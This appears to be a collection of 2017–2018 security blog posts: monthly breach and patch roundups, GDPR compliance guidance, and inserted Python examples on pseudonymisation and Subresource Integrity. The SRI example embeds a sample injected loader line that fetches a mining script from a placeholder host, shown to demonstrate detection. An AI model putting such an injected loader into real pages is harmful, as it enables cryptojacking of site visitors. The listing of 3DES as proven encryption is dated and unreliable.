Always make sure your broadband router/hub does not permit remote administrative access (over the internet) and is always kept up-to-date with the latest security patches; otherwise, it will be at serious risk of being hacked and remotely controlled by cyber-criminals. This month provided the evidence: a DNS flaw in over 800,000 DrayTek routers allowed hackers to take them over, malware called VPNFilter infected 500,000 routers, and serious vulnerabilities were reported in TP-Link EAP controllers.

IBM made headlines after banning its workers from using USB sticks, which I think is a good and reasonable policy. Quite frankly, in any modern enterprise, whether large or small, with a decent IT infrastructure and cloud services, staff shouldn't need USB devices to move data either internally or externally with third parties, so I see banning all USB devices as a rather smart business and security move, as it forces staff to use the more secure and more efficient technology made available to them.

As my @securityexpert twitter account crossed the 10,000 follower threshold, Twitter advised 300 million users to reset their passwords after an internal error. Apparently, the passwords for the Twitter accounts were accidentally stored in a database in their "plain text" form instead of as a hashed value, as per best practice. I always strongly recommend that Twitter users take advantage of the multi-factor authentication Twitter provides, which reduces the risk of account hacking.

Breaches of note in May included a T-Mobile website bug which exposed personal customer data, Coca-Cola said an insider breached 8,000 accounts, and BMW cars were found to have over a dozen security vulnerabilities.

As always a busy month of new security patch releases, with Microsoft, Adobe, PHP, PGP, Google, Git, and Dell all releasing critical security updates to fix significant security flaws. Click the links for the full details.

Analysis of DDoS attacks at Cloudflare has revealed that while organisations in the UK have certainly upped their spending on DDoS mitigation, cyber-criminals are now responding by switching to Layer 7 based DDoS attacks.

Some interesting articles this month: the Welsh Cyber Security Revolution, and a review of the NHS a year on from the WannaCry outbreak.

Reports of interest this month include the Thales Data Threat Report, which found UK businesses to be the most breached in Europe, and the LastPass Psychology of Passwords Report, which found that 59% of people surveyed used the same passwords across multiple accounts, despite 91% of them knowing that using the same password for multiple accounts is a security risk. The 2017 Cylance Report stated that the number of cyber-attacks on industries such as healthcare, manufacturing, professional services, and education rose by about 13.4% between 2016 and 2017.


Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help application developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organization outside of Europe that handles the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizens' personal data or allow EU citizens to sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation.

Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that can alleviate an application's privacy risk.

GDPR Planning and the Cloud

Data protection is on a lot of people’s minds this week. The Facebook testimony in Congress has focused attention on data privacy. Against this backdrop, IT security professionals are focused on two on-going developments: the roll-out next month of new European regulations on data (the General Data Protection Regulation, or GDPR) as well as the continued migrations of data to the public cloud.

GDPR is mostly about giving people back control over their data by empowering them. Among other rights and duties, it concerns the safe handling of data, data subject rights such as the “right to be forgotten”, and breach reporting. But apparently it will not slow migration to the cloud.

According to a McAfee report being released today, Navigating a Cloudy Sky, nearly half of companies responding plan to increase or keep stable their investment in the public, private or hybrid cloud, and the GDPR does not appear to be a showstopper for them. Fewer than 10 percent of companies anticipate decreasing their cloud investment because of the GDPR.

Getting Help for GDPR Compliance

What is the practical impact of all this? Say your CISO is in the early stages of setting up a GDPR compliance program. In any enterprise it’s important to understand the areas of risk. The first step in managing risk is taking a deep look at where the risk areas exist.

McAfee will feature a GDPR Demo [1] at the RSA conference in San Francisco this week that will help IT pros understand where to start. The demo walks conference attendees through five different GDPR compliance scenarios, at different levels of a fictional company and for different GDPR Articles, so that they can start to get a feel for GDPR procedure and see the tools which will help identify risk areas and demonstrate the capabilities for each.

Remember, with GDPR end-users are now empowered to request the data of which they are the subject, and to request that it be wiped. With the latest data loss prevention software, compliance teams will be able to service these requests by exporting reports for given users and wiping those users’ data. But a lot of companies still need to learn the specific procedures for complying with GDPR rules.

GDPR could be looked at as another regulation to be complied with – but savvy companies can also look at it as a competitive advantage. Customers are increasingly asking for privacy and control. Will your business be there waiting for them?

The cloud, GDPR and customer calls for privacy are three developments that are not going away – the best stance is preparation.

[1] McAfee will be in the North Hall, booth #N3801 (the “Data Protection and GDPR” booth) and also in the South Hall at the McAfee Skyhigh booth, #S1301.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post GDPR Planning and the Cloud appeared first on McAfee Blogs.

Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection

When the European Union’s (EU) General Data Protection Regulation (GDPR) comes into full force on May 25, European citizens will receive greater privacy protection and regulators will have strengthened authority to take action against businesses that breach the new laws. Fines of up to 4% of annual global revenue or €20 million, whichever is greater, can be levied against any organization that processes personal data of EU residents, regardless of where it is based. Stories with doomsday predictions and generous helpings of fear can be found in many publications.

McAfee recently published an executive summary of our report, Beyond GDPR: Data Residency Insights from Around the World, that focuses on responses from the 200 professionals surveyed in the financial services sector. While there remains work to be done, it’s not all doom and gloom for the financial services industry. More than one quarter (27%) of financial services firms surveyed are already set up to comply with the GDPR requirement for controllers to report a breach to the appropriate authorities within 72 hours of becoming aware of it, compared to just 20% of other industries. This is most likely the result of greater preparation, as the financial sector has a higher proportion of firms (28%) that have been working on compliance for three to four years, compared to the global average of just two years.

We believe that the looming threat of GDPR fines is an opportunity to communicate the seriousness of these regulations to your board and executives, and to position the firm as one that cares about personal privacy. And that could help boost the bottom line according to survey respondents – some 80% of financial services respondents believe that organizations that properly apply data protection laws will attract new customers.

Knowing what data is stored where is one of the most important steps of this data protection activity, but here are a few more that we recommend.

Step 1. Know Your Data.

Not only where it is, but what it is, why you are collecting it, and what levels of security and encryption are used to protect it. If you are collecting personal data that is not essential to your service offering, you may want to reconsider what you collect to better manage your risk of exposure, and comply with data-minimization principles.

Step 2. Enforce Encryption.

Effective encryption protects data by making it useless to hackers in the event of a data breach. Use proven encryption technologies, such as the Triple Data Encryption Standard (3DES), RSA, or the Advanced Encryption Standard (AES), to ensure the safe storage of both your employees’ data and your customers’ data.

Step 3. Pseudonymize personally identifiable information (PII).

Modifying data prior to processing so that it cannot be traced back to a specific individual provides another layer of data protection. Pseudonymizing your data allows you to take advantage of Big Data and do larger scale data analysis, and is viewed as an appropriate technical and organizational measure under Article 32 of the GDPR.

Step 4. Get Executive Management Involved.

The necessary changes to your data storage, monitoring, management, and security systems can require more human and financial resources than are currently budgeted. The potential of significant fines is an excellent opportunity to get the required support from the highest levels of your organization.

Step 5. Appoint a Project Owner.

Staying compliant with various data protection laws is not something that can be done by an IT staffer in their spare time. Consider appointing a data protection officer or equivalent, to take ownership of both implementation and ongoing management of this project. A data protection officer may be required in any event, depending on the nature of the processing carried out.

Step 6. Review Data Security with Cloud Vendors.

With cloud computing and storage touching most business processes in some fashion, consider conducting an audit of all your vendors’ systems, procedures, and contracts, and the data that they are handling and storing on your behalf. After all, each organization will be held responsible for meeting the GDPR requirements.

Step 7. Foster a Security-Aware Culture.

Human errors are often responsible for data and security breaches. It doesn’t matter that your business follows the strictest security protocol: one error made by one uninformed person could lead to irreparable damage. Consider making sure that all your employees and contractors receive proper and regular training on data security and the handling of customer information.

Step 8. Have a Response Plan.

No system is 100% bulletproof. You need an incident response plan in place to make sure that you can recover as quickly as possible in the event of a data breach. Under GDPR law, you are required as a controller to alert the appropriate authorities within 72 hours of becoming aware of a data breach, and you also need to notify any individuals whose personal data has been compromised.

Step 9. Go with a Privacy by Design Approach.

The GDPR places a requirement on organizations to take data privacy into account during the design stages of all projects. Companies will want to consider data-protection technologies such as data loss prevention (DLP) and cloud access security broker (CASB) tools from the very beginning of development. Implement data-protection policies that help prevent both accidental and malicious data theft by insiders and cybercriminals, regardless of where the data resides.
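Step 3 above says to pseudonymize PII before processing; the following is an added example of how that is done in practice, not McAfee's code. It replaces direct identifiers with a keyed HMAC-SHA256 pseudonym (one key per purpose, so datasets cannot be joined) and keeps the re-identification table separate, in contrast to a plain SHA-256 of an email address, which anyone can recompute from a guessed address. The key, field names and sample records are this example's assumptions.

```python
"""Keyed pseudonymisation of PII for analytics (GDPR Art. 4(5), Art. 32).

Constructed example: customer records are split into (a) an analytics
dataset whose direct identifiers are replaced by HMAC-SHA256 pseudonyms and
(b) a re-identification table held separately by the controller. Because
that table (and the key) exist, the pseudonymous data is still personal
data under the GDPR; it is a risk-reduction measure, not anonymisation.
"""
import hashlib
import hmac
import secrets

DIRECT_IDENTIFIERS = ("email", "full_name")   # fields removed from analytics
PSEUDONYM_SOURCE = "email"                     # field the pseudonym derives from


def pseudonym(identifier: str, key: bytes, purpose: str) -> str:
    """Deterministic keyed pseudonym; 'purpose' gives key separation so the
    same person gets unlinkable ids in the analytics and marketing sets."""
    msg = purpose.encode() + b"\x00" + identifier.strip().lower().encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def unkeyed_hash(identifier: str) -> str:
    """The weak form: no secret, so anyone holding a candidate address can
    recompute it and link the record back. Shown only for comparison."""
    return hashlib.sha256(identifier.strip().lower().encode()).hexdigest()


def pseudonymise(records, key: bytes, purpose: str):
    """Return (analytics_rows, reidentification_table)."""
    analytics, reident = [], {}
    for rec in records:
        pid = pseudonym(rec[PSEUDONYM_SOURCE], key, purpose)
        row = {k: v for k, v in rec.items() if k not in DIRECT_IDENTIFIERS}
        row["subject_id"] = pid
        analytics.append(row)
        reident[pid] = {k: rec[k] for k in DIRECT_IDENTIFIERS}
    return analytics, reident


def erase_subject(identifier: str, key: bytes, purpose: str,
                  analytics: list, reident: dict) -> bool:
    """Honour an erasure request: drop the mapping and the subject's rows.
    Returns False when the identifier was never in the dataset."""
    pid = pseudonym(identifier, key, purpose)
    removed = reident.pop(pid, None) is not None
    analytics[:] = [r for r in analytics if r["subject_id"] != pid]
    return removed


# Constructed sample input; note the repeated customer with different casing.
SAMPLE_RECORDS = [
    {"email": "Ann@Example.com", "full_name": "Ann Adams", "balance": 120.0, "region": "IE"},
    {"email": "bob@example.org", "full_name": "Bob Byrne", "balance": 75.5, "region": "IE"},
    {"email": "ann@example.com", "full_name": "Ann Adams", "balance": 30.0, "region": "IE"},
]


if __name__ == "__main__":
    key = secrets.token_bytes(32)      # in practice: held in a KMS/HSM, not with the data
    rows, mapping = pseudonymise(SAMPLE_RECORDS, key, "analytics")
    for row in rows:
        print(row)
    print("subjects in re-identification table:", len(mapping))
    erase_subject("ann@example.com", key, "analytics", rows, mapping)
    print("after erasure:", len(rows), "rows,", len(mapping), "subjects")
```

The analytics rows can be shared with a processor without the key; the controller alone can answer access and erasure requests through the mapping table.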

While no one can guarantee that you will not suffer a data loss, following these steps will help you understand where you stand, identify any gaps, and improve your organization’s responsiveness. Loss of customer confidence was the most common concern of financial services organisations (64%), and rapid containment and response is one of the best ways to protect your firm’s valuable reputation. So keep calm, and prepare for GDPR.

Read the full report, Beyond GDPR: Data Residency Insights from Around the World, and learn more about the top data-protection concerns and strategies of more than 800 senior business professionals from eight countries and a range of industries.


The post Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection appeared first on McAfee Blogs.

The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day

At one point in my career, I was responsible for launching massive websites.  We’d talk about when and how we flip the switch to launch the new website.  At least once during every project someone would ask me who got to flip the switch, as though we would have a dignitary (or them?) do it.  But depending on the year, the flipping on of a website was handled through technology and not very dramatic and not with the fanfare the non-technologists hoped for. (Dimming lights? Fireworks?  It was New York and it was publishing, so there was often beer and wine and maybe T-shirts after, but everyone went home and slept.)

And now we have May 25th coming around the corner. The other day, I got a picture in a text from a colleague of a can of sardines.  It took me a minute to realize the expiration was May 25.  So, other than the sardines, what happens?  Are we done?

First the bad news:  We won't ever be done.  GDPR requires constant diligence for its principles, recurring reviews of the processes we've built; ongoing use of Data Protection Impact Assessments (DPIAs); vigilance on how we process, store, transfer and use personal data; communications with our customers; new contractual language and new things to negotiate; ongoing discussions around security and what is "appropriate".  And of course, the biggest question: What will the data regulators do?  Will there be an immediate fine? (My bet is no.)

But now the good news: If you’ve been doing this right and have managed to focus on the concepts of Great Data Protection Rocks and a culture of security, the following things may have happened:

  • You have a much better idea of what data you have, where it is stored, who can get to it, and how it gets used. Hopefully you have deleted some data and have additional automated processes to delete data when it ceases to be needed.
  • You have processes in place to replace things that were being done on the fly. Maybe there’s some documentation and someone officially designated to help with the processes.
  • You know who your vendors are, and more about your high-risk and cloud vendors.
  • You have determined what needs securing and made sure you are securing it “appropriately.”
  • You’ve got a team of people who understand data protection and GDPR – maybe some new friends and some new project partners. A few of them may not have bought in completely (the people who were “voluntold” to help), but just wait.  Something often  seems to happen in the doubter’s personal life that makes them get it – and big time.  Real examples:  Mortgage application reveals massive identity theft that needs to be fixed or they lose the house; soccer coach sends kid’s medical condition info to the whole team’s parents; intern (not at McAfee!) sends spreadsheet of fraternity members’ contact info, but it also contained everyone’s grade-point average.

Perhaps most importantly, your company now has momentum around doing the right thing regarding data protection.  And May 25th will come – too soon, not soon enough, or both! – and the lights won’t dim but there might be T-shirts.

It would be easy to forget GDPR’s lessons. In the United States, Monday, May 28th, is Memorial Day, and we pull out summer clothes, take off to mark the start of summer, and remember our heroes.  But on that Monday and Tuesday and every day after, Great Data Protection will still Rock, and we will still need to look at data, how it’s used, and how our culture can protect it. Just maybe throw out the sardines if they don’t get eaten beforehand (or leave them on the doubter’s desk as a joke).


The post The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day appeared first on McAfee Blogs.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shake-up since the dawn of the internet, and it is just weeks before it comes into force on 25th May. GDPR comes with potentially head-spinning financial penalties for businesses found not to be complying, so it really is essential for any business which touches the personal data of people in the EU to thoroughly do its privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

Cyber Security Roundup for February 2018

February saw over 5,000 websites infected with cryptocurrency-mining code after a popular accessibility script called 'BrowseAloud' was compromised by hackers. This led to several UK Government and Council websites going offline, including those of the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon Councils. Symantec researchers also announced that 'cryptojacking' attacks had increased 1,200% in the UK. Cryptojacking once meant installing cryptocurrency-mining malware on users' computers, but it now more often happens in-browser: the attacker compromises a website, or, as in the BrowseAloud case, a third-party script that thousands of websites embed, so that malicious mining JavaScript executes in the browser of every visitor for as long as the page stays open.
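The BrowseAloud incident is the textbook case for Subresource Integrity (SRI): a site that embeds a third-party script can pin the exact file it vetted by putting a digest in the `integrity` attribute, and the browser refuses to run the script if the bytes served no longer match. The following is an added example, not code from the original post or from BrowseAloud or Texthelp, showing how that digest is generated at build time and how the browser-side comparison works. The two script bodies are constructed for the example (a harmless stub and the same stub with an injected loader line appended, which is the shape the real compromise took); the domain in the injected line is a placeholder.

```python
import base64
import hashlib
import hmac

# Constructed sample: the third-party script body as vetted and pinned at build time.
TRUSTED_SCRIPT = b"(function(){window.browsealoud={speak:function(t){}};})();\n"

# Constructed sample: the same file after an attacker appended a loader for a
# mining script. The host name is a placeholder, not a real indicator.
TAMPERED_SCRIPT = TRUSTED_SCRIPT + (
    b'var s=document.createElement("script");'
    b's.src="https://miner.example/lib.js";document.head.appendChild(s);\n'
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the only ones the SRI spec allows


def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Return the SRI integrity value for a script body, e.g. 'sha384-<base64>'."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"SRI does not allow {algo!r}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Render the <script> tag that pins `src` to `body`. crossorigin is needed
    for cross-origin scripts, otherwise the browser cannot read the response
    body to hash it and will refuse to execute the script."""
    return (f'<script src="{src}" integrity="{sri_digest(body)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(body: bytes, integrity: str) -> bool:
    """Mirror of the browser check: the served body is accepted only if it
    matches one of the digests listed in the integrity attribute (the spec
    permits several, space-separated). Unknown algorithm tokens are skipped;
    if nothing usable is left this returns False, which is stricter than
    browsers, which treat an attribute with no recognised token as absent."""
    for token in integrity.split():
        algo, _, _ = token.partition("-")
        if algo not in SRI_ALGORITHMS:
            continue
        if hmac.compare_digest(sri_digest(body, algo), token):
            return True
    return False


def check_served_script(src: str, pinned: bytes, served: bytes) -> dict:
    """Build the pinned tag for `pinned`, then report whether `served` (what the
    CDN actually returned) would be allowed to run under that tag."""
    integrity = sri_digest(pinned)
    return {"tag": script_tag(src, pinned),
            "integrity": integrity,
            "served_ok": verify_sri(served, integrity)}


if __name__ == "__main__":
    src = "https://www.browsealoud.com/plus/scripts/ba.js"
    print(check_served_script(src, TRUSTED_SCRIPT, TRUSTED_SCRIPT)["served_ok"])   # True
    print(check_served_script(src, TRUSTED_SCRIPT, TAMPERED_SCRIPT)["served_ok"])  # False
```

Two caveats a practitioner should keep in mind. SRI only protects scripts whose content you can pin; a vendor that legitimately updates the file in place will break your page until you re-pin, which is the price of not silently inheriting their compromise. And it does nothing for scripts the pinned file loads dynamically, so pair it with a Content-Security-Policy `script-src` that does not allow arbitrary hosts.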

More than 25% of UK Councils are said to have suffered a breach in the last five years according to the privacy group Big Brother Watch, who said UK Councils are unprepared for Cyber Attacks.

There was a fascinating report released on the malicious use of Artificial Intelligence (AI), written by 26 leading AI experts. The report forecasts the various malicious uses for AI, including in cybercrime and in the manipulation of social media and national news media agendas.

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can attempt to guess the value of various types of stolen data to cybercriminals: Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates, which saw Microsoft release over 50 patches, and there were new critical security updates by Adobe, Apple, Cisco, Dell, and Drupal.


GDPR Material and Territorial Scopes

The new EU General Data Protection Regulation will enter into force on 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, he has kindly allowed me to repost.

If you are after further GDPR swotting up, you could always read the actual regulation, the EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitals.

If you have any other GDPR-related articles or blogs of note, please post them in the comments.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after security researchers, including Google's Project Zero, disclosed serious vulnerabilities affecting just about every modern computer processor in use on the planet. Named 'Meltdown' and 'Spectre', when exploited by a hacker or malware these vulnerabilities allow confidential data to be read from memory the attacker should have no access to, such as secrets held by the operating system kernel or by other processes. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor microcode. While the processor manufacturers were rather lethargic in reacting and producing stable microcode patches for the problem, software vendors such as Microsoft, Google and Apple reacted quickly, releasing security updates that mitigate the vulnerabilities on affected processors; kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for security inadequacies and fined the company £400K following its 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack". Where have we heard that excuse before? Certainly the ICO wasn't buying it after it investigated, reporting a large number of security failures at Carphone Warehouse, which included the use of software that was six years out of date; a lack of "rigorous controls" over who had login details to systems; no antivirus protection running on the servers holding the data; the same root password being used on every individual server, which was known to "some 30-40 members of staff"; and the needless storage of full credit card details. Carphone Warehouse should thank its lucky stars the breach didn't occur after the General Data Protection Regulation comes into force: with such a damning list of security failures, the company may well have been fined considerably more by the ICO, which is granted vastly greater financial sanctions and powers when the GDPR kicks in in May.

The National Cyber Security Centre warned that the UK national infrastructure faces serious nation-state attacks, stating it is a matter of "when" not "if". There were also claims that the cyberattacks against Ukraine in recent years were down to Russia testing and tuning its nation-state cyberattack capabilities.

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPetya ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, a web wallet for Stellar Lumens (XLM). After hijacking BlackWallet's DNS records, the hackers redirected its users to a fake replica of the BlackWallet website; the replica site ran a script that transferred around 700k Lumens from users' wallets into the hackers' wallet, and the hackers then moved the currency on to a different wallet platform. It is a reminder that a site's DNS provider account is part of its attack surface: a stolen registrar or DNS login defeats TLS and every control on the real servers, because the victims never reach them.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice to their parents or obtaining their consent.

It was reported that a POS malware infection at Forever 21, together with lapses in point-of-sale encryption, was responsible for the theft of debit and credit card details from Forever 21 stores late last year. Payment card data continues to be a highly valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and that 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed during the course of the year; no surprise there.

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

Cyber Security Roundup for November 2017

One of the most notable data breaches disclosed this month was by Uber, given the company attempted to cover up the breach by paying off the hackers. Over a year ago the transport tech firm was said to have paid £75,000 to two hackers to delete 57 million Uber account records which they had stolen. Uber revealed around 2.7 million of the stolen records belonged to British riders and drivers. As a UK Uber rider this could include me; I haven't received any notification of the data breach from Uber as yet. The stolen information included names, email addresses, and phone numbers. Uber can expect enforcement action from regulators on both sides of the pond; the UK Information Commissioner's Office (ICO) said it had "huge concerns" about the breach and was investigating.

Jewson, Cash Converters, and Imgur all reported losing data due to hacks this month, while Equifax reported suffering significant financial losses following its high-profile hack of customer personal data. Equifax reported its net income had dropped by £20 million due to the hack, and its breach bill was coming in at a whopping £67 million.

November was a very busy month for security patch releases, with Microsoft, Apple, Adobe, Oracle, Cisco and Intel releasing a raft of patches to fix critical vulnerabilities. Apple even had to quickly release an emergency patch at the end of November to fix a root access flaw reported in macOS High Sierra version 10.13.1. So keep patching everything in your IT estate to ensure you and your business stay ahead of enterprising cybercriminals; the Equifax breach is a prime example of what can go wrong when system patching is neglected.

November also saw the Open Web Application Security Project (OWASP) finally release the 2017 update to its Top Ten application vulnerabilities list, which is 'must know' secure coding best practice for all software developers and security testers, especially considering that Akamai reported web application attacks had increased by 69% in the third quarter of 2017. Look out for updated OWASP Top Ten IBM developerWorks guidance from me in December to reflect the updated list.